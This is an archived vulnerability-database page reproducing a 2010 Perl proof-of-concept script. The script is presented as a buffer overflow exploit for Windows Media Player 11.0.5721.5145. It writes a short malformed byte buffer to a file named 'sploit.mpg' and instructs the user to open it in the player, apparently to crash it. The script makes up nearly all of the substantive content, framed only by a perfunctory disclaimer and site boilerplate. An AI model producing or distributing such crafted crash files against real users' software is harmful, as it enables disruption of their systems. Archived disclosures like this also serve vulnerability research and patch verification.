Lucene search
K

Windows Media Player 11.0.5721.5145 Buffer Overflow

🗓️ 23 Feb 2010 00:00:00Reported by cr4wl3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Windows Media Player 11.0.5721.5145 buffer overflow exploit created by cr4wl3r for educational use.

Code
`#!/usr/bin/perl  
  
  
# Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit  
# Homepage: www.microsoft.com  
# Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>  
# From: Indonesia  
#  
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
# WARNING - WARNING - WARNING - WARNING  
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
#  
#  
#  
# Disclaimer: The author published the information under the condition  
# that is not in the intention of the reader to use them in order to bring  
# to himself or others a profit or to bring to others damage.  
#  
#  
# Gr33tz: No Thanks  
  
  
  
print "  
[+]---------------------------------------------------------------------[+]  
[+] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [+]  
[+] By : cr4wl3r [+]  
[+]---------------------------------------------------------------------[+]  
";  
  
  
$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";  
  
open(file, "> sploit.mpg");  
print (file $buff);  
print "\n\n[+] Done...!!!\n  
[+] Open with Windows Media Player\n  
[+] Coded by cr4wl3r\n";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Feb 2010 00:00Current
1.4Low risk
Vulners AI Score1.4
17